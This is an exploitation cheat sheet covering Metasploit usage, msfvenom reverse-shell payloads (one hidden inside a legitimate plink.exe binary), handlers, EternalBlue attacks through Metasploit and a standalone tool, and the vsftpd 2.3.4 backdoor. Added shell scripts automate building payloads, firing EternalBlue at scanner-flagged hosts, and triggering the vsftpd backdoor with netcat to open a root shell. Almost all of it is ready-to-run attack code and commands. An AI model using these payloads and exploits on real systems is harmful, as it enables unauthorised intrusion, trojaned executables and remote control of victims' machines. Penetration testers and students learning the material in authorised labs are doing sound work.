# Exploitation

### Metasploit

```shell
# Start Metasploit (run as root or via sudo; the PostgreSQL backend is optional but makes hosts, services and loot searchable)
systemctl start postgresql
systemctl enable postgresql
msfdb init
msfconsole

# Metasploit module types
#   Auxiliary:  scanners, enumeration, fuzzing, sniffing etc.; no payload is delivered
#   Exploits:   code that triggers a vulnerability and delivers a payload
#   Payloads:   the code that executes on the target (singles, or stager + stage)
#   Encoders:   transform a payload into another byte form (mainly to avoid bad characters, not to defeat modern AV)
#   Post:       post-exploitation modules run through an existing session
#   Nops:       generate NOP sleds used to pad payloads
#   Evasion:    modules that generate evasive payload files

# Metasploit commands
help
show {all|exploits|payloads|auxiliary|post}
search vsftpd
search type:exploit smb
info {ModuleName}
use {ModuleName}
info
show options
set {Variable} {value}
setg {Variable} {value}   # global value kept across modules, e.g. LHOST
run                       # alias of exploit
check                     # where the module supports it, test without exploiting
back

# Ex1 SNMP service enumeration
use auxiliary/scanner/snmp/snmp_enum
info
show options
set RHOSTS 192.168.1.244
run

# Ex2 SMB version scanning
use auxiliary/scanner/smb/smb_version
info
show options
set RHOSTS 192.168.1.1-254
run

# Ex3 FTP login check: tries the user/password lists plus blank passwords
# (for the anonymous-login test alone, auxiliary/scanner/ftp/anonymous is the dedicated module)
use auxiliary/scanner/ftp/ftp_login
info
show options
set USER_FILE /root/user.txt
set PASS_FILE /root/pass.txt
set BLANK_PASSWORDS true
set RHOSTS 192.168.1.0/24
run
```

### Client-Side Attacks

#### Standalone Payload

```bash
# Windows (staged Meterpreter; the handler must be set to exactly the same payload name)
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.2.15 LPORT=4444 -f exe -o file.exe

# Linux
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.0.2.15 LPORT=4444 -f elf -o file.elf

# Python (raw script, run with python on the target)
msfvenom -p python/meterpreter/reverse_tcp LHOST=10.0.2.15 LPORT=4444 -f raw -o file.py

# Embedded inside an existing binary (-x uses plink.exe as the template; add -k to try to keep the template's original behaviour)
msfvenom -p windows/shell_reverse_tcp LHOST=10.0.2.15 LPORT=4444 -f exe -x /usr/share/windows-resources/binaries/plink.exe -o embedded.exe
```

#### Setup Listener

```bash
msfconsole
> use exploit/multi/handler
> set PAYLOAD windows/meterpreter/reverse_tcp   # must match the msfvenom -p value exactly (staged and stageless payloads differ)
> show options
> set LHOST 10.0.2.15
> set LPORT 4444
> set ExitOnSession false                       # keep listening after the first session arrives
> exploit -j                                    # run as a background job; `sessions -i 1` to interact
```
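The payload and the handler above only work together when PAYLOAD, LHOST and LPORT are identical on both sides, and a typo there is the usual reason a callback never arrives. The script below is an added example, not code from the original page: it derives the msfvenom output format from the payload platform, builds the payload (only when `BUILD=1`, so it also runs on a box without Metasploit) and prints a matching `multi/handler` resource script for `msfconsole -r`. The helper names (`payload_format`, `gen_handler_rc`, `build_payload`) and the default LHOST/LPORT/PAYLOAD values are this example's own assumptions.

```shell
#!/bin/sh
# Added example (not from the original page): build an msfvenom payload and a
# multi/handler resource script whose PAYLOAD/LHOST/LPORT match it exactly.
# Helper names and the default values below are assumptions of this example.

PAYLOAD="${PAYLOAD:-windows/meterpreter/reverse_tcp}"
LHOST="${LHOST:-10.0.2.15}"      # assumed attacker address
LPORT="${LPORT:-4444}"
OUT="${OUT:-payload}"            # output file name without extension

# Pick the msfvenom output format from the payload's platform prefix.
# Returns 1 for platforms this helper does not cover so the caller aborts instead of guessing.
payload_format() {
    case "$1" in
        windows/*) echo exe ;;
        linux/*)   echo elf ;;
        python/*)  echo raw ;;
        *)         return 1 ;;
    esac
}

# Print an msfconsole resource script for a handler matching the payload triple.
# ExitOnSession false plus "exploit -j -z" keeps the handler listening for further callbacks.
gen_handler_rc() {
    printf 'use exploit/multi/handler\n'
    printf 'set PAYLOAD %s\n' "$1"
    printf 'set LHOST %s\n' "$2"
    printf 'set LPORT %s\n' "$3"
    printf 'set ExitOnSession false\n'
    printf 'exploit -j -z\n'
}

# Run msfvenom with the same triple the handler uses. Only executed on request (BUILD=1).
build_payload() {
    fmt=$(payload_format "$1") || { echo "unsupported payload platform: $1" >&2; return 1; }
    command -v msfvenom >/dev/null 2>&1 || { echo "msfvenom not found" >&2; return 127; }
    msfvenom -p "$1" LHOST="$2" LPORT="$3" -f "$fmt" -o "$4.$fmt"
}

if [ "${BUILD:-0}" = "1" ]; then
    build_payload "$PAYLOAD" "$LHOST" "$LPORT" "$OUT"
fi
# The resource script goes to stdout: ./mkpayload.sh > handler.rc && msfconsole -q -r handler.rc
gen_handler_rc "$PAYLOAD" "$LHOST" "$LPORT"
```

Run it as `BUILD=1 PAYLOAD=linux/x86/meterpreter/reverse_tcp LHOST=10.0.2.15 LPORT=4444 ./mkpayload.sh > handler.rc` and start the listener with `msfconsole -q -r handler.rc`; because both sides read the same three variables there is nothing to retype.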

### Windows Service Side Attack

#### Exploit for MS17-010

```bash
# Confirm the target first (auxiliary/scanner/smb/smb_ms17_010, or the module's own `check`):
# a failed EternalBlue attempt can crash the host
use exploit/windows/smb/ms17_010_eternalblue
info
show options
set RHOSTS 192.168.1.19
show payloads
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.114
exploit
```
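Because EternalBlue can blue-screen a host that is not actually vulnerable, it is worth running `auxiliary/scanner/smb/smb_ms17_010` over the range first and feeding only the flagged hosts to the exploit. The script below is an added example, not code from the original page: it parses the scanner's `[+] ... VULNERABLE to MS17-010` lines and emits a resource script that runs the exploit module against each confirmed host, one at a time. The log lines are constructed to resemble the scanner's output, and the helper names and LHOST value are this example's own assumptions.

```shell
#!/bin/sh
# Added example (not from the original page): gate the EternalBlue module on the
# smb_ms17_010 scanner result. Helper names and LHOST are assumptions of this example.

LHOST="${LHOST:-192.168.1.114}"

# Constructed sample of smb_ms17_010 output. The real run would be something like:
#   msfconsole -q -x 'use auxiliary/scanner/smb/smb_ms17_010; set RHOSTS 192.168.1.0/24; run; exit' | tee ms17.log
SAMPLE_LOG='[*] 192.168.1.18:445      - Host does NOT appear vulnerable.
[+] 192.168.1.19:445      - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[+] 192.168.1.23:445      - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Standard 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.1.0/24:445    - Scanned 256 of 256 hosts (100% complete)'

# Print one IP per line for every host the scanner flagged, deduplicated.
# $1 is the log text; "[+]" lines carry the positive results, the second field is ip:port.
vulnerable_hosts() {
    printf '%s\n' "$1" | grep '^\[+\] .*VULNERABLE to MS17-010' | awk '{print $2}' | cut -d: -f1 | sort -u
}

# Emit a resource script that exploits each confirmed host in turn ($1 = log text, $2 = LHOST).
# Refuses to emit anything when no host passed the check, so "msfconsole -r" has nothing to fire.
gen_exploit_rc() {
    hosts=$(vulnerable_hosts "$1")
    [ -n "$hosts" ] || { echo "no hosts flagged vulnerable; not exploiting" >&2; return 1; }
    printf 'use exploit/windows/smb/ms17_010_eternalblue\n'
    printf 'set PAYLOAD windows/x64/meterpreter/reverse_tcp\n'
    printf 'set LHOST %s\n' "$2"
    for h in $hosts; do
        printf 'set RHOSTS %s\n' "$h"
        printf 'exploit -j -z\n'
    done
}

# Use a real log when one is supplied on the command line, otherwise the constructed sample.
if [ -n "${1:-}" ] && [ -f "$1" ]; then
    LOG_TEXT=$(cat "$1")
else
    LOG_TEXT="$SAMPLE_LOG"
fi
gen_exploit_rc "$LOG_TEXT" "$LHOST"
```

Usage: `./ms17_gate.sh ms17.log > eternalblue.rc && msfconsole -q -r eternalblue.rc`. Hosts are exploited one per `exploit -j` call rather than as a single RHOSTS range so that a crash on one target is visible before the next attempt starts.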

#### Manual Exploit for MS17-010

```bash
# AutoBlue: a standalone (non-Metasploit) EternalBlue implementation
git clone https://github.com/3ndG4me/AutoBlue-MS17-010
cd AutoBlue-MS17-010
cd shellcode
./shell_prep.sh        # prompts for LHOST/LPORT and the payload type; writes the shellcode blobs, including the merged sc_all.bin
cd ..
./listener_prep.sh     # starts the matching multi/handler
# exploit7 targets Windows 7 / Server 2008 R2; eternalblue_exploit8.py is the Windows 8 / Server 2012 variant
python eternalblue_exploit7.py 192.168.1.4 shellcode/sc_all.bin
```

### Linux Service Side Exploit

#### Exploit for vsftpd 2.3.4

```bash
use exploit/unix/ftp/vsftpd_234_backdoor
info
show options
set RHOSTS 192.168.1.115
show payloads
set payload cmd/unix/interact   # the backdoor opens a root shell on TCP 6200; the module triggers it and connects there
exploit
```

#### Manual Exploit for vsftpd 2.3.4

```bash
git clone https://github.com/In2econd/vsftpd-2.3.4-exploit
cd vsftpd-2.3.4-exploit
python3 vsftpd_234_exploit.py 192.168.1.115 21 whoami
python3 vsftpd_234_exploit.py 192.168.1.115 21 "cat /etc/passwd"
```
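The backdoor in the trojaned vsftpd 2.3.4 tarball needs no exploit framework at all: a `USER` name containing `:)` makes the daemon listen with a root shell on TCP 6200. The script below is an added example, not code from the original page or the repository above: it checks the FTP banner, sends the trigger with netcat, verifies that port 6200 opened, and only then connects. The helper names and the target address are this example's own assumptions; the banner strings used in the check are constructed.

```shell
#!/bin/sh
# Added example (not from the original page): trigger the vsftpd 2.3.4 backdoor by hand
# with netcat. Helper names and TARGET/FTP_PORT defaults are assumptions of this example.

TARGET="${TARGET:-}"          # e.g. TARGET=192.168.1.115 ./vsftpd_manual.sh
FTP_PORT="${FTP_PORT:-21}"
BACKDOOR_PORT=6200            # port the backdoored daemon listens on after the trigger

# Decide from the FTP banner whether the host claims the backdoored version.
# Returns 0 for a banner starting "220 (vsFTPd 2.3.4)", 1 otherwise.
banner_is_vsftpd_234() {
    printf '%s\n' "$1" | grep -q '^220 (vsFTPd 2\.3\.4)'
}

# Read the first line the server sends; -w bounds the wait if the service is slow or silent.
fetch_banner() {
    nc -w 3 "$1" "$2" < /dev/null | head -n 1 | tr -d '\r'
}

# Send the trigger. The login never completes, so the connection is simply left to time out;
# all that matters is that a USER line containing ":)" reached the daemon.
trigger_backdoor() {
    printf 'USER anything:)\r\nPASS anything\r\n' | nc -w 3 "$1" "$2" >/dev/null 2>&1 || true
    sleep 1
}

# Confirm that 6200 opened before handing over an interactive shell.
use_backdoor() {
    if nc -z -w 3 "$1" "$BACKDOOR_PORT" 2>/dev/null; then
        echo "[+] $1:$BACKDOOR_PORT is open, connecting (run 'id' to confirm root)" >&2
        nc "$1" "$BACKDOOR_PORT"
    else
        echo "[-] $BACKDOOR_PORT did not open: not the backdoored build, already triggered, or filtered" >&2
        return 1
    fi
}

if [ -n "$TARGET" ]; then
    banner=$(fetch_banner "$TARGET" "$FTP_PORT")
    if banner_is_vsftpd_234 "$banner"; then
        trigger_backdoor "$TARGET" "$FTP_PORT"
        use_backdoor "$TARGET"
    else
        echo "[-] banner '$banner' is not vsFTPd 2.3.4; skipping" >&2
        exit 1
    fi
fi
```

Without `TARGET` set the script only defines its functions, so it can be sourced for the banner check alone. The banner test is a version claim, not proof of the backdoor: a rebuilt 2.3.4 from the clean source prints the same banner and never opens 6200, which is why the script checks the port before connecting.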

